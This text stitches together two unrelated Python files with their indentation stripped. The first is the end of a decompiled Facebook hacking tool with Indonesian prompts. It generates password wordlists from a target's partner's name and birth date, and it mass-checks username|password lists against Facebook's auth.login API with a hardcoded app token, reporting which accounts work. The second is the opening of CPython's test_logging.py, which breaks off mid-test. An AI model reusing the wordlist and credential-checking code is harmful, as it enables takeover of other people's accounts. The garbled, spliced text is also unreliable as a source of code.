print '\x1b[1;91m[?] \x1b[1;93mKalo Jomblo SKIP aja :v'
i=raw_input('\x1b[1;91m[+] \x1b[1;92mNama Pacar \x1b[1;97m: ')
j=raw_input(
'\x1b[1;91m[+] \x1b[1;92mNama Panggilan Pacar \x1b[1;97m: ')
k=raw_input(
'\x1b[1;91m[+] \x1b[1;92mDate of birth Pacar >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: ')
jalan(
'\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mWait a minute \x1b[1;97m...')
l=k[0:2]
m=k[2:4]
n=k[4:]
file.write('%s%s\n%s%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s' % (
a, c, a, b, b, a, b, c, c, a, c, b, a, a, b, b, c, c, a, d, b, d, c, d, d, d, d, a, d, b, d, c, a, e, a, f, a, g, a, h, b, e, b, f, b, g, b, h, c, e, c, f, c, g, c, h, d, e, d, f, d, g, d, h, e, a, f, a, g, a, h, a, e, b, f, b, g, b, h, b, e, c, f, c, g, c, h, c, e, d, f, d, g, d, h, d, d, d, a, f, g, a, g, h, f, g, f, h, f, f, g, f, g, h, g, g, h, f, h, g, h, h, h, g, f, a, g, h, b, f, g, b, g, h, c, f, g, c, g, h, d, f, g, d, g, h, a, i, a, j, a, k, i, e, i, j, i, k, b, i, b, j, b, k, c, i, c, j, c, k, e, k, j, a, j, b, j, c, j, d, j, j, k, a, k, b, k, c, k, d, k, k, i, l, i, m, i, n, j, l, j, m, j, n, j, k))
wg=0
while wg < 100:
wg=wg + 1
file.write(a + str(wg) + '\n')
en=0
while en < 100:
en=en + 1
file.write(i + str(en) + '\n')
word=0
while word < 100:
word=word + 1
file.write(d + str(word) + '\n')
gen=0
while gen < 100:
gen=gen + 1
file.write(j + str(gen) + '\n')
file.close()
time.sleep(1.5)
print '\n\x1b[1;91m[+] \x1b[1;97mTersimpan \x1b[1;91m: \x1b[1;97m %s.txt' % a
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except IOError as e:
print '\x1b[1;91m[!] Gagal membuat file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def check_akun():
os.system('clear')
try:
toket=open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;92mIsi File\x1b[1;91m : \x1b[1;97musername|password'
print 40 * '\x1b[1;97m\xe2\x95\x90'
live=[]
cek=[]
die=[]
try:
file=raw_input(
'\x1b[1;91m[+] \x1b[1;92mFile \x1b[1;91m:\x1b[1;97m ')
list=open(file, 'r').readlines()
except IOError:
print '\x1b[1;91m[!] File tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
pemisah=raw_input('\x1b[1;91m[+] \x1b[1;92mPemisah \x1b[1;91m:\x1b[1;97m ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mWait a minute \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for meki in list:
username, password=meki.strip().split(str(pemisah))
url='https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' +
username + '&locale=en_US&password=' + password +
'&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6'
data=requests.get(url)
mpsh=json.loads(data.text)
if 'access_token' in mpsh:
live.append(password)
print '\x1b[1;97m[\x1b[1;92mLive\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
elif 'www.facebook.com' in mpsh['error_msg']:
cek.append(password)
print '\x1b[1;97m[\x1b[1;93mCheck\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
else:
die.append(password)
print '\x1b[1;97m[\x1b[1;91mMati\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
print '\n\x1b[1;91m[+] \x1b[1;97mTotal\x1b[1;91m : \x1b[1;97mLive=\x1b[1;92m' + str(len(live)) + ' \x1b[1;97mCheck=\x1b[1;93m' + str(len(cek)) + ' \x1b[1;97mDie=\x1b[1;91m' + str(len(die))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def grupsaya():
os.system('clear')
try:
toket=open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mWait a minute \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
try:
uh=requests.get(
'https://graph.facebook.com/me/groups?access_token=' + toket)
gud=json.loads(uh.text)
for p in gud['data']:
nama=p['name']
id=p['id']
f=open('grupid.txt', 'w')
listgrup.append(id)
f.write(id + '\n')
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama \x1b[1;91m:\x1b[1;97m ' + str(nama)
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + str(id)
print 40 * '\x1b[1;97m='
print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah Grup \x1b[1;96m%s' % len(listgrup)
print '\x1b[1;91m[+] \x1b[1;97mTersimpan \x1b[1;91m: \x1b[1;97mgrupid.txt'
f.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Terhenti'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except KeyError:
os.remove('grupid.txt')
print '\x1b[1;91m[!] Grup tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] There is nothing koneksi'
keluar()
except IOError:
print '\x1b[1;91m[!] Kesalahan saat membuat file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def guard():
global toket
os.system('clear')
try:
toket=open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;37;40m1. Aktifkan'
print '\x1b[1;37;40m2. NonAktifkan'
print '\x1b[1;31;40m0. Back'
print
g=raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
if g == '1':
aktif='true'
gaz(toket, aktif)
else:
if g == '2':
non='false'
gaz(toket, non)
else:
if g == '0':
lain()
else:
if g == '':
keluar()
else:
keluar()
def get_userid(toket):
url='https://graph.facebook.com/me?access_token=%s' % toket
res=requests.get(url)
uid=json.loads(res.text)
return uid['id']
def gaz(toket, enable=True):
id=get_userid(toket)
data='variables={"0":{"is_shielded": %s,"session_id":"9b78191c-84fd-4ab6-b0aa-19b39f04a6bc","actor_id":"%s","client_mutation_id":"b0316dd6-3fd6-4beb-aed4-bb29c5dc64b0"}}&method=post&doc_id=1477043292367183&query_name=IsShieldedSetMutation&strip_defaults=true&strip_nulls=true&locale=en_US&client_country_code=US&fb_api_req_friendly_name=IsShieldedSetMutation&fb_api_caller_class=IsShieldedSetMutation' % (
enable, str(id))
headers={'Content-Type': 'application/x-www-form-urlencoded',
'Authorization': 'OAuth %s' % toket}
url='https://graph.facebook.com/graphql'
res=requests.post(url, data=data, headers=headers)
print res.text
if '"is_shielded":true' in res.text:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mDiaktifkan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
else:
if '"is_shielded":false' in res.text:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;91mDinonaktifkan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
else:
print '\x1b[1;91m[!] Error'
keluar()
if __name__ == '__main__':
login()
# okay decompiling 3.pyc
|
test_logging.py
|
# Copyright 2001-2019 by Vinay Sajip. All Rights Reserved.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose and without fee is hereby granted,
# provided that the above copyright notice appear in all copies and that
# both that copyright notice and this permission notice appear in
# supporting documentation, and that the name of Vinay Sajip
# not be used in advertising or publicity pertaining to distribution
# of the software without specific, written prior permission.
# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL
# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR
# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER
# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""Test harness for the logging module. Run all tests.
Copyright (C) 2001-2019 Vinay Sajip. All Rights Reserved.
"""
import logging
import logging.handlers
import logging.config
import codecs
import configparser
import copy
import datetime
import pathlib
import pickle
import io
import gc
import json
import os
import queue
import random
import re
import signal
import socket
import struct
import sys
import tempfile
from test.support.script_helper import assert_python_ok, assert_python_failure
from test import support
import textwrap
import threading
import time
import unittest
import warnings
import weakref
import asyncore
from http.server import HTTPServer, BaseHTTPRequestHandler
import smtpd
from urllib.parse import urlparse, parse_qs
from socketserver import (ThreadingUDPServer, DatagramRequestHandler,
ThreadingTCPServer, StreamRequestHandler)
try:
import win32evtlog, win32evtlogutil, pywintypes
except ImportError:
win32evtlog = win32evtlogutil = pywintypes = None
try:
import zlib
except ImportError:
pass
class BaseTest(unittest.TestCase):
"""Base class for logging tests."""
log_format = "%(name)s -> %(levelname)s: %(message)s"
expected_log_pat = r"^([\w.]+) -> (\w+): (\d+)$"
message_num = 0
def setUp(self):
"""Setup the default logging stream to an internal StringIO instance,
so that we can examine log output as we want."""
self._threading_key = support.threading_setup()
logger_dict = logging.getLogger().manager.loggerDict
logging._acquireLock()
try:
self.saved_handlers = logging._handlers.copy()
self.saved_handler_list = logging._handlerList[:]
self.saved_loggers = saved_loggers = logger_dict.copy()
self.saved_name_to_level = logging._nameToLevel.copy()
self.saved_level_to_name = logging._levelToName.copy()
self.logger_states = logger_states = {}
for name in saved_loggers:
logger_states[name] = getattr(saved_loggers[name],
'disabled', None)
finally:
logging._releaseLock()
# Set two unused loggers
self.logger1 = logging.getLogger("\xab\xd7\xbb")
self.logger2 = logging.getLogger("\u013f\u00d6\u0047")
self.root_logger = logging.getLogger("")
self.original_logging_level = self.root_logger.getEffectiveLevel()
self.stream = io.StringIO()
self.root_logger.setLevel(logging.DEBUG)
self.root_hdlr = logging.StreamHandler(self.stream)
self.root_formatter = logging.Formatter(self.log_format)
self.root_hdlr.setFormatter(self.root_formatter)
if self.logger1.hasHandlers():
hlist = self.logger1.handlers + self.root_logger.handlers
raise AssertionError('Unexpected handlers: %s' % hlist)
if self.logger2.hasHandlers():
hlist = self.logger2.handlers + self.root_logger.handlers
raise AssertionError('Unexpected handlers: %s' % hlist)
self.root_logger.addHandler(self.root_hdlr)
self.assertTrue(self.logger1.hasHandlers())
self.assertTrue(self.logger2.hasHandlers())
def tearDown(self):
"""Remove our logging stream, and restore the original logging
level."""
self.stream.close()
self.root_logger.removeHandler(self.root_hdlr)
while self.root_logger.handlers:
h = self.root_logger.handlers[0]
self.root_logger.removeHandler(h)
h.close()
self.root_logger.setLevel(self.original_logging_level)
logging._acquireLock()
try:
logging._levelToName.clear()
logging._levelToName.update(self.saved_level_to_name)
logging._nameToLevel.clear()
logging._nameToLevel.update(self.saved_name_to_level)
logging._handlers.clear()
logging._handlers.update(self.saved_handlers)
logging._handlerList[:] = self.saved_handler_list
manager = logging.getLogger().manager
manager.disable = 0
loggerDict = manager.loggerDict
loggerDict.clear()
loggerDict.update(self.saved_loggers)
logger_states = self.logger_states
for name in self.logger_states:
if logger_states[name] is not None:
self.saved_loggers[name].disabled = logger_states[name]
finally:
logging._releaseLock()
self.doCleanups()
support.threading_cleanup(*self._threading_key)
def assert_log_lines(self, expected_values, stream=None, pat=None):
"""Match the collected log lines against the regular expression
self.expected_log_pat, and compare the extracted group values to
the expected_values list of tuples."""
stream = stream or self.stream
pat = re.compile(pat or self.expected_log_pat)
actual_lines = stream.getvalue().splitlines()
self.assertEqual(len(actual_lines), len(expected_values))
for actual, expected in zip(actual_lines, expected_values):
match = pat.search(actual)
if not match:
self.fail("Log line does not match expected pattern:\n" +
actual)
self.assertEqual(tuple(match.groups()), expected)
s = stream.read()
if s:
self.fail("Remaining output at end of log stream:\n" + s)
def next_message(self):
"""Generate a message consisting solely of an auto-incrementing
integer."""
self.message_num += 1
return "%d" % self.message_num
class BuiltinLevelsTest(BaseTest):
"""Test builtin levels and their inheritance."""
def test_flat(self):
# Logging levels in a flat logger namespace.
m = self.next_message
ERR = logging.getLogger("ERR")
ERR.setLevel(logging.ERROR)
INF = logging.LoggerAdapter(logging.getLogger("INF"), {})
INF.setLevel(logging.INFO)
DEB = logging.getLogger("DEB")
DEB.setLevel(logging.DEBUG)
# These should log.
ERR.log(logging.CRITICAL, m())
ERR.error(m())
INF.log(logging.CRITICAL, m())
INF.error(m())
INF.warning(m())
INF.info(m())
DEB.log(logging.CRITICAL, m())
DEB.error(m())
DEB.warning(m())
DEB.info(m())
DEB.debug(m())
# These should not log.
ERR.warning(m())
ERR.info(m())
ERR.debug(m())
INF.debug(m())
self.assert_log_lines([
('ERR', 'CRITICAL', '1'),
('ERR', 'ERROR', '2'),
('INF', 'CRITICAL', '3'),
('INF', 'ERROR', '4'),
('INF', 'WARNING', '5'),
('INF', 'INFO', '6'),
('DEB', 'CRITICAL', '7'),
('DEB', 'ERROR', '8'),
('DEB', 'WARNING', '9'),
('DEB', 'INFO', '10'),
('DEB', 'DEBUG', '11'),
])
def test_nested_explicit(self):
# Logging levels in a nested namespace, all explicitly set.
m = self.next_message
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
INF_ERR = logging.getLogger("INF.ERR")
INF_ERR.setLevel(logging.ERROR)
# These should log.
INF_ERR.log(logging.CRITICAL, m())
INF_ERR.error(m())
# These should not log.
INF_ERR.warning(m())
INF_ERR.info(m())
INF_ERR.debug(m())
self.assert_log_lines([
('INF.ERR', 'CRITICAL', '1'),
('INF.ERR', 'ERROR', '2'),
])
def test_nested_inherited(self):
# Logging levels in a nested namespace, inherited from parent loggers.
m = self.next_message
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
INF_ERR = logging.getLogger("INF.ERR")
INF_ERR.setLevel(logging.ERROR)
INF_UNDEF = logging.getLogger("INF.UNDEF")
INF_ERR_UNDEF = logging.getLogger("INF.ERR.UNDEF")
UNDEF = logging.getLogger("UNDEF")
# These should log.
INF_UNDEF.log(logging.CRITICAL, m())
INF_UNDEF.error(m())
INF_UNDEF.warning(m())
INF_UNDEF.info(m())
INF_ERR_UNDEF.log(logging.CRITICAL, m())
INF_ERR_UNDEF.error(m())
# These should not log.
INF_UNDEF.debug(m())
INF_ERR_UNDEF.warning(m())
INF_ERR_UNDEF.info(m())
INF_ERR_UNDEF.debug(m())
self.assert_log_lines([
('INF.UNDEF', 'CRITICAL', '1'),
('INF.UNDEF', 'ERROR', '2'),
('INF.UNDEF', 'WARNING', '3'),
('INF.UNDEF', 'INFO', '4'),
('INF.ERR.UNDEF', 'CRITICAL', '5'),
('INF.ERR.UNDEF', 'ERROR', '6'),
])
def test_nested_with_virtual_parent(self):
# Logging levels when some parent does not exist yet.
m = self.next_message
INF = logging.getLogger("INF")
GRANDCHILD = logging.getLogger("INF.BADPARENT.UNDEF")
CHILD = logging.getLogger("INF.BADPARENT")
INF.setLevel(logging.INFO)
# These should log.
GRANDCHILD.log(logging.FATAL, m())
GRANDCHILD.info(m())
CHILD.log(logging.FATAL, m())
CHILD.info(m())
# These should not log.
GRANDCHILD.debug(m())
CHILD.debug(m())
self.assert_log_lines([
('INF.BADPARENT.UNDEF', 'CRITICAL', '1'),
('INF.BADPARENT.UNDEF', 'INFO', '2'),
('INF.BADPARENT', 'CRITICAL', '3'),
('INF.BADPARENT', 'INFO', '4'),
])
def test_regression_22386(self):
"""See issue #22386 for more information."""
self.assertEqual(logging.getLevelName('INFO'), logging.INFO)
self.assertEqual(logging.getLevelName(logging.INFO), 'INFO')
def test_issue27935(self):
fatal = logging.getLevelName('FATAL')
self.assertEqual(fatal, logging.FATAL)
def test_regression_29220(self):
"""See issue #29220 for more information."""
logging.addLevelName(logging.INFO, '')
self.addCleanup(logging.addLevelName, logging.INFO, 'INFO')
self.assertEqual(logging.getLevelName(logging.INFO), '')
self.assertEqual(logging.getLevelName(logging.NOTSET), 'NOTSET')
self.assertEqual(logging.getLevelName('NOTSET'), logging.NOTSET)
class BasicFilterTest(BaseTest):
"""Test the bundled Filter class."""
def test_filter(self):
# Only messages satisfying the specified criteria pass through the
# filter.
filter_ = logging.Filter("spam.eggs")
handler = self.root_logger.handlers[0]
try:
handler.addFilter(filter_)
spam = logging.getLogger("spam")
spam_eggs = logging.getLogger("spam.eggs")
spam_eggs_fish = logging.getLogger("spam.eggs.fish")
spam_bakedbeans = logging.getLogger("spam.bakedbeans")
spam.info(self.next_message())
spam_eggs.info(self.next_message()) # Good.
spam_eggs_fish.info(self.next_message()) # Good.
spam_bakedbeans.info(self.next_message())
self.assert_log_lines([
('spam.eggs', 'INFO', '2'),
('spam.eggs.fish', 'INFO', '3'),
])
finally:
handler.removeFilter(filter_)
def test_callable_filter(self):
# Only messages satisfying the specified criteria pass through the
# filter.
def filterfunc(record):
parts = record.name.split('.')
prefix = '.'.join(parts[:2])
return prefix == 'spam.eggs'
handler = self.root_logger.handlers[0]
try:
handler.addFilter(filterfunc)
spam = logging.getLogger("spam")
spam_eggs = logging.getLogger("spam.eggs")
spam_eggs_fish = logging.getLogger("spam.eggs.fish")
spam_bakedbeans = logging.getLogger("spam.bakedbeans")
spam.info(self.next_message())
spam_eggs.info(self.next_message()) # Good.
spam_eggs_fish.info(self.next_message()) # Good.
spam_bakedbeans.info(self.next_message())
self.assert_log_lines([
('spam.eggs', 'INFO', '2'),
('spam.eggs.fish', 'INFO', '3'),
])
finally:
handler.removeFilter(filterfunc)
def test_empty_filter(self):
f = logging.Filter()
r = logging.makeLogRecord({'name': 'spam.eggs'})
self.assertTrue(f.filter(r))
#
# First, we define our levels. There can be as many as you want - the only
# limitations are that they should be integers, the lowest should be > 0 and
# larger values mean less information being logged. If you need specific
# level values which do not fit into these limitations, you can use a
# mapping dictionary to convert between your application levels and the
# logging system.
#
SILENT = 120
TACITURN = 119
TERSE = 118
EFFUSIVE = 117
SOCIABLE = 116
VERBOSE = 115
TALKATIVE = 114
GARRULOUS = 113
CHATTERBOX = 112
BORING = 111
LEVEL_RANGE = range(BORING, SILENT + 1)
#
# Next, we define names for our levels. You don't need to do this - in which
# case the system will use "Level n" to denote the text for the level.
#
my_logging_levels = {
SILENT : 'Silent',
TACITURN : 'Taciturn',
TERSE : 'Terse',
EFFUSIVE : 'Effusive',
SOCIABLE : 'Sociable',
VERBOSE : 'Verbose',
TALKATIVE : 'Talkative',
GARRULOUS : 'Garrulous',
CHATTERBOX : 'Chatterbox',
BORING : 'Boring',
}
class GarrulousFilter(logging.Filter):
"""A filter which blocks garrulous messages."""
def filter(self, record):
return record.levelno != GARRULOUS
class VerySpecificFilter(logging.Filter):
"""A filter which blocks sociable and taciturn messages."""
def filter(self, record):
return record.levelno not in [SOCIABLE, TACITURN]
class CustomLevelsAndFiltersTest(BaseTest):
"""Test various filtering possibilities with custom logging levels."""
# Skip the logger name group.
expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$"
def setUp(self):
BaseTest.setUp(self)
for k, v in my_logging_levels.items():
logging.addLevelName(k, v)
def log_at_all_levels(self, logger):
for lvl in LEVEL_RANGE:
logger.log(lvl, self.next_message())
def test_logger_filter(self):
# Filter at logger level.
self.root_logger.setLevel(VERBOSE)
# Levels >= 'Verbose' are good.
self.log_at_all_levels(self.root_logger)
self.assert_log_lines([
('Verbose', '5'),
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
])
def test_handler_filter(self):
# Filter at handler level.
self.root_logger.handlers[0].setLevel(SOCIABLE)
try:
# Levels >= 'Sociable' are good.
self.log_at_all_levels(self.root_logger)
self.assert_log_lines([
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
])
finally:
self.root_logger.handlers[0].setLevel(logging.NOTSET)
def test_specific_filters(self):
# Set a specific filter object on the handler, and then add another
# filter object on the logger itself.
handler = self.root_logger.handlers[0]
specific_filter = None
garr = GarrulousFilter()
handler.addFilter(garr)
try:
self.log_at_all_levels(self.root_logger)
first_lines = [
# Notice how 'Garrulous' is missing
('Boring', '1'),
('Chatterbox', '2'),
('Talkative', '4'),
('Verbose', '5'),
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
]
self.assert_log_lines(first_lines)
specific_filter = VerySpecificFilter()
self.root_logger.addFilter(specific_filter)
self.log_at_all_levels(self.root_logger)
self.assert_log_lines(first_lines + [
# Not only 'Garrulous' is still missing, but also 'Sociable'
# and 'Taciturn'
('Boring', '11'),
('Chatterbox', '12'),
('Talkative', '14'),
('Verbose', '15'),
('Effusive', '17'),
('Terse', '18'),
('Silent', '20'),
])
finally:
if specific_filter:
self.root_logger.removeFilter(specific_filter)
handler.removeFilter(garr)
class HandlerTest(BaseTest):
def test_name(self):
h = logging.Handler()
h.name = 'generic'
self.assertEqual(h.name, 'generic')
h.name = 'anothergeneric'
self.assertEqual(h.name, 'anothergeneric')
self.assertRaises(NotImplementedError, h.emit, None)
def test_builtin_handlers(self):
# We can't actually *use* too many handlers in the tests,
# but we can try instantiating them with various options
if sys.platform in ('linux', 'darwin'):
for existing in (True, False):
fd, fn = tempfile.mkstemp()
os.close(fd)
if not existing:
os.unlink(fn)
h = logging.handlers.WatchedFileHandler(fn, delay=True)
if existing:
dev, ino = h.dev, h.ino
self.assertEqual(dev, -1)
self.assertEqual(ino, -1)
r = logging.makeLogRecord({'msg': 'Test'})
h.handle(r)
# Now remove the file.
os.unlink(fn)
self.assertFalse(os.path.exists(fn))
# The next call should recreate the file.
h.handle(r)
self.assertTrue(os.path.exists(fn))
else:
self.assertEqual(h.dev, -1)
self.assertEqual(h.ino, -1)
h.close()
if existing:
os.unlink(fn)
if sys.platform == 'darwin':
sockname = '/var/run/syslog'
else:
sockname = '/dev/log'
try:
h = logging.handlers.SysLogHandler(sockname)
self.assertEqual(h.facility, h.LOG_USER)
self.assertTrue(h.unixsocket)
h.close()
except OSError: # syslogd might not be available
pass
for method in ('GET', 'POST', 'PUT'):
if method == 'PUT':
self.assertRaises(ValueError, logging.handlers.HTTPHandler,
'localhost', '/log', method)
else:
h = logging.handlers.HTTPHandler('localhost', '/log', method)
h.close()
h = logging.handlers.BufferingHandler(0)
r = logging.makeLogRecord({})
self.assertTrue(h.shouldFlush(r))
h.close()
h = logging.handlers.BufferingHandler(1)
self.assertFalse(h.shouldFlush(r))
h.close()
def test_path_objects(self):
"""
Test that Path objects are accepted as filename arguments to handlers.
See Issue #27493.
"""
fd, fn = tempfile.mkstemp()
os.close(fd)
os.unlink(fn)
pfn = pathlib.Path(fn)
cases = (
(logging.FileHandler, (pfn, 'w')),
(logging.handlers.RotatingFileHandler, (pfn, 'a')),
(logging.handlers.TimedRotatingFileHandler, (pfn, 'h')),
)
if sys.platform in ('linux', 'darwin'):
cases += ((logging.handlers.WatchedFileHandler, (pfn, 'w')),)
for cls, args in cases:
h = cls(*args)
self.assertTrue(os.path.exists(fn))
h.close()
os.unlink(fn)
@unittest.skipIf(os.name == 'nt', 'WatchedFileHandler not appropriate for Windows.')
def test_race(self):
# Issue #14632 refers.
def remove_loop(fname, tries):
for _ in range(tries):
try:
os.unlink(fname)
self.deletion_time = time.time()
except OSError:
pass
time.sleep(0.004 * random.randint(0, 4))
del_count = 500
log_count = 500
self.handle_time = None
self.deletion_time = None
for delay in (False, True):
fd, fn = tempfile.mkstemp('.log', 'test_logging-3-')
os.close(fd)
remover = threading.Thread(target=remove_loop, args=(fn, del_count))
remover.daemon = True
remover.start()
h = logging.handlers.WatchedFileHandler(fn, delay=delay)
f = logging.Formatter('%(asctime)s: %(levelname)s: %(message)s')
h.setFormatter(f)
try:
for _ in range(log_count):
time.sleep(0.005)
r = logging.makeLogRecord({'msg': 'testing' })
try:
self.handle_time = time.time()
h.handle(r)
except Exception:
print('Deleted at %s, '
'opened at %s' % (self.deletion_time,
self.handle_time))
raise
finally:
remover.join()
h.close()
if os.path.exists(fn):
os.unlink(fn)
# The implementation relies on os.register_at_fork existing, but we test
# based on os.fork existing because that is what users and this test use.
# This helps ensure that when fork exists (the important concept) that the
# register_at_fork mechanism is also present and used.
@unittest.skipIf(not hasattr(os, 'fork'), 'Test requires os.fork().')
def test_post_fork_child_no_deadlock(self):
"""Ensure child logging locks are not held; bpo-6721 & bpo-36533."""
class _OurHandler(logging.Handler):
def __init__(self):
super().__init__()
self.sub_handler = logging.StreamHandler(
stream=open('/dev/null', 'wt'))
def emit(self, record):
self.sub_handler.acquire()
try:
self.sub_handler.emit(record)
finally:
self.sub_handler.release()
self.assertEqual(len(logging._handlers), 0)
refed_h = _OurHandler()
self.addCleanup(refed_h.sub_handler.stream.close)
refed_h.name = 'because we need at least one for this test'
self.assertGreater(len(logging._handlers), 0)
self.assertGreater(len(logging._at_fork_reinit_lock_weakset), 1)
test_logger = logging.getLogger('test_post_fork_child_no_deadlock')
test_logger.addHandler(refed_h)
test_logger.setLevel(logging.DEBUG)
locks_held__ready_to_fork = threading.Event()
fork_happened__release_locks_and_end_thread = threading.Event()
def lock_holder_thread_fn():
logging._acquireLock()
try:
refed_h.acquire()
try:
# Tell the main thread to do the fork.
locks_held__ready_to_fork.set()
# If the deadlock bug exists, the fork will happen
# without dealing with the locks we hold, deadlocking
# the child.
# Wait for a successful fork or an unreasonable amount of
# time before releasing our locks. To avoid a timing based
# test we'd need communication from os.fork() as to when it
# has actually happened. Given this is a regression test
# for a fixed issue, potentially less reliably detecting
# regression via timing is acceptable for simplicity.
# The test will always take at least this long. :(
fork_happened__release_locks_and_end_thread.wait(0.5)
finally:
refed_h.release()
finally:
logging._releaseLock()
lock_holder_thread = threading.Thread(
target=lock_holder_thread_fn,
name='test_post_fork_child_no_deadlock lock holder')
lock_holder_thread.start()
locks_held__ready_to_fork.wait()
pid = os.fork()
if pid == 0: # Child.
try:
test_logger.info(r'Child process did not deadlock. \o/')
finally:
os._exit(0)
else: # Parent.
test_logger.info(r'Parent process returned from fork. \o/')
fork_happened__release_locks_and_end_thread.set()
lock_holder_thread.join()
start_time = time.monotonic()
while True:
test_logger.debug('Waiting for child process.')
waited_pid, status = os.waitpid(pid, os.WNOHANG)
if waited_pid == pid:
break # child process exited.
if time.monotonic() - start_time > 7:
break # so long? implies child deadlock.
time.sleep(0.05)
test_logger.debug('Done waiting.')
if waited_pid != pid:
os.kill(pid, signal.SIGKILL)
waited_pid, status = os.waitpid(pid, 0)
self.fail("child process deadlocked.")
self.assertEqual(status, 0, msg="child process error")
class BadStream(object):
def write(self, data):
raise RuntimeError('deliberate mistake')
class TestStreamHandler(logging.StreamHandler):
def handleError(self, record):
self.error_record = record
class StreamWithIntName(object):
level = logging.NOTSET
name = 2
class StreamHandlerTest(BaseTest):
def test_error_handling(self):
h = TestStreamHandler(BadStream())
r = logging.makeLogRecord({})
old_raise = logging.raiseExceptions
try:
h.handle(r)
self.assertIs(h.error_record, r)
h = logging.StreamHandler(BadStream())
with support.captured_stderr() as stderr:
h.handle(r)
msg = '\nRuntimeError: deliberate mistake\n'
self.assertIn(msg, stderr.getvalue())
logging.raiseExceptions = False
with support.captured_stderr() as stderr:
h.handle(r)
self.assertEqual('', stderr.getvalue())
finally:
